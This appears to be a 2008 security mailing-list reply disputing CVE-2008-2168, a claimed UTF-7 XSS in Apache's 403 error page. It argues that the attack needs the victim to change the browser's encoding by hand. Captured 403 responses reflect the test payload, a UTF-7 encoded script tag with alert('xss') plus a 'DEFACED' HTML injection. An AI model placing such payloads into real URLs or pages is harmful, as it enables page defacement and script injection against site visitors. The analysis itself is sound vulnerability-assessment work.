Re: Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability

[Tom.Donovan () acm org]

re: "set 403 page's charset in the server side by writing it in your server code"

Apache *does* set the charset in the HTTP header.  It is set to iso-8859-1 by default.

Adding a <meta http-equiv> tag with the iso-8859-1 charset does not change the browser behavior.  See below for the 
captured response from a test with this change.

The user can still manually override the charset to UTF-7 via the browser menu, regardless of anything the Apache 
server sends.

re: "There is no problem to trick the victim and force him to change the encoding of his browser by little social 
engineering"

For the Apache 403 error page, the only opportunity to "trick" the victim is within the URL itself. It would be quite a 
feat of social engineering to do this within a URL, between the phrases "You don't have permission to access" and "on 
this server".

There are many possible malicious strings in UTF-7, and any sequence of character values less than 0x80 starting with a 
"+" is potentially a UTF-7 string.  This is why it is not appropriate for browsers to automatically interpret text as 
UTF-7.  Preventing a user from manually overriding the specified charset and interpreting strings as UTF-7 is not 
something a web server can do. If you feel this manual function should be disabled in browsers, it may be better to let 
the browser developers know.

re: percent-encoding the "+" character in URLs

The "+" character is a reserved character in URIs per RFC2396 (see section 2.2 Reserved Characters). RFC3986 goes 
further and explains why reserved characters like "+" should not be percent-encoded:

  "Percent-encoding a reserved character, or decoding a percent-encoded octet
   that corresponds to a reserved character, will change how the URI is
   interpreted by most applications.  Thus, characters in the reserved
   set are protected from normalization and are therefore safe to be
   used by scheme-specific and producer-specific algorithms for
   delimiting data subcomponents within a URI."

A previous writer has correctly noted that Microsoft recommends just the opposite: that "+" characters should be 
percent-encoded.

Below are the responses to your test URL from various versions of Apache servers on different platforms. Note that the 
iso-8859-1 charset is specified by the Content-Type header in all cases. The last example is with Apache 2.2.8 modified 
to include a <meta http-equiv> tag in the body.  The behavior remains the same in both Firefox or IE with this change.

It is a problem for web server developers when a vulnerability is accepted and propagated with a description like:
"here is a malicious URL - the victim must perform these manual steps with it - We leave it to other hackers to upgrade 
the attack and make it fully automatic."

It is a disappointment that CVE-2008-2168 was accepted so uncritically.

Regards,
-tom-


====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.example.com Port 80</address>
</body></html>

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:37:17 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g SVN/1.4.6 DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 510
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
</body></html>

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:47:29 GMT
Server: Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch mod_python/3.3.1 Python/2.4.5
Content-Length: 666
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
<hr>
<address>Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch mod_python/3.3.1 Python/2.4.5 Server at 
www.victim.com Port 80</address>
</body></html>

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 04:45:49 GMT
Server: Apache/1.3.33 (Unix)
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

23c
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.<P>
<HR>
<ADDRESS>Apache/1.3.33 Server at localhost Port 80</ADDRESS>
</BODY></HTML>

0

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:53:10 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g SVN/1.4.6 DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
</body></html>